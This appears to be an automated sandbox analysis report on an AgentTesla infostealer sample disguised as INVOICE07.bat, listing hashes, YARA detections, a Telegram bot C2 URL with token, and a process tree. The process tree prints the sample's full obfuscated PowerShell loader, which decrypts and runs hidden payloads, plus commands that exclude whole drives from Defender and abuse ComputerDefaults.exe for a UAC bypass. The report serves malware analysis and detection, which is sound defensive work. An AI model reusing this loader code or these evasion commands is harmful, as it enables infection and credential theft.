Analysis
max time kernel: 91s
max time network: 108s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-06-2024 01:39

Static task: static1
Behavioral task: behavioral1
Sample: INVOICE07.bat
Resource: win7-20240215-en
General
Target: INVOICE07.bat
Size: 540KB
MD5: 1952a79579272db52a814baf57821f90
SHA1: 3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
SHA256: e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
SHA512: 088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
SSDEEP: 12288:xToPjPt8r1cxIMTOQo5Xq4PpsXis9Jhqd8FJVqzT+53xH:xeWrOa4UaYpsXlJIdwSIZ
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot7135973864:AAGVqtrGeLysm0FYcz68sQIn3nL2a6CxjMc/
Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.

Detect packed .NET executables. Mostly AgentTeslaV4. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_EXE_Packed_GEN01

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_Binary_References_Browsers

Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL

Detects executables referencing Windows vault credential objects. Observed in infostealers. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store

Detects executables referencing many email and collaboration clients. Observed in information stealers. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients

Detects executables referencing many file transfer clients. Observed in information stealers. 1 IoCs
Processes:
resource: behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients

Blocklisted process makes network request. 2 IoCs
Processes:
flow  pid  Process
16    396  powershell.exe
19    396  powershell.exe

Command and Scripting Interpreter: PowerShell. 1 TTPs, 5 IoCs
Runs PowerShell and hides the display window.
Processes:
pid   Process
1528  powershell.exe
396   powershell.exe
1560  powershell.exe
3932  powershell.exe
1852  powershell.exe

Executes dropped EXE. 1 IoCs
Processes:
pid   Process
4256  ComputerDefaults.exe

Loads dropped DLL. 1 IoCs
Processes:
pid   Process
4256  ComputerDefaults.exe

Looks up external IP address via web service. 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
15    api.ipify.org
16    api.ipify.org
17    ip-api.com

Suspicious behavior: EnumeratesProcesses. 14 IoCs
Processes:
pid   Process
1528  powershell.exe
1528  powershell.exe
3932  powershell.exe
3932  powershell.exe
396   powershell.exe
396   powershell.exe
1852  powershell.exe
1852  powershell.exe
1852  powershell.exe
1560  powershell.exe
1560  powershell.exe
396   powershell.exe
396   powershell.exe
396   powershell.exe

Suspicious use of AdjustPrivilegeToken. 5 IoCs
Processes:
description              pid   Process
Token: SeDebugPrivilege  1528  powershell.exe
Token: SeDebugPrivilege  3932  powershell.exe
Token: SeDebugPrivilege  396   powershell.exe
Token: SeDebugPrivilege  1852  powershell.exe
Token: SeDebugPrivilege  1560  powershell.exe

Suspicious use of WriteProcessMemory. 24 IoCs
Processes:
description                       pid   Process               procid_target
PID 1324 wrote to memory of 3780  1324  cmd.exe               83
PID 1324 wrote to memory of 3780  1324  cmd.exe               83
PID 1324 wrote to memory of 4712  1324  cmd.exe               85
PID 1324 wrote to memory of 4712  1324  cmd.exe               85
PID 1324 wrote to memory of 1528  1324  cmd.exe               86
PID 1324 wrote to memory of 1528  1324  cmd.exe               86
PID 1528 wrote to memory of 3932  1528  powershell.exe        90
PID 1528 wrote to memory of 3932  1528  powershell.exe        90
PID 1528 wrote to memory of 4072  1528  powershell.exe        94
PID 1528 wrote to memory of 4072  1528  powershell.exe        94
PID 4072 wrote to memory of 4256  4072  cmd.exe               96
PID 4072 wrote to memory of 4256  4072  cmd.exe               96
PID 4256 wrote to memory of 636   4256  ComputerDefaults.exe  97
PID 4256 wrote to memory of 636   4256  ComputerDefaults.exe  97
PID 636 wrote to memory of 4844   636   cmd.exe               99
PID 636 wrote to memory of 4844   636   cmd.exe               99
PID 636 wrote to memory of 4508   636   cmd.exe               100
PID 636 wrote to memory of 4508   636   cmd.exe               100
PID 636 wrote to memory of 396    636   cmd.exe               101
PID 636 wrote to memory of 396    636   cmd.exe               101
PID 396 wrote to memory of 1852   396   powershell.exe        104
PID 396 wrote to memory of 1852   396   powershell.exe        104
PID 396 wrote to memory of 1560   396   powershell.exe        106
PID 396 wrote to memory of 1560   396   powershell.exe        106

Processes

PID 1324 (level 1)
  Image: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"
  - Suspicious use of WriteProcessMemory

  PID 3780 (level 2)
    Image: C:\Windows\system32\cmd.exe
    Command line: cmd /c "set __=^&rem"

  PID 4712 (level 2)
    Image: C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

  PID 1528 (level 2)
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    PID 3932 (level 3)
      Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    PID 4072 (level 3)
      Image: C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
      - Suspicious use of WriteProcessMemory

      PID 4256 (level 4)
        Image: C:\Windows \System32\ComputerDefaults.exe
        Command line: "C:\Windows \System32\ComputerDefaults.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        PID 636 (level 5)
          Image: C:\Windows\SYSTEM32\cmd.exe
          Command line: cmd.exe /c call SC.cmd
          - Suspicious use of WriteProcessMemory

          PID 4844 (level 6)
            Image: C:\Windows\system32\cmd.exe
            Command line: cmd /c "set __=^&rem"

          PID 4508 (level 6)
            Image: C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

          PID 396 (level 6)
            Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            PID 1852 (level 7)
              Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            PID 1560 (level 7)
              Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken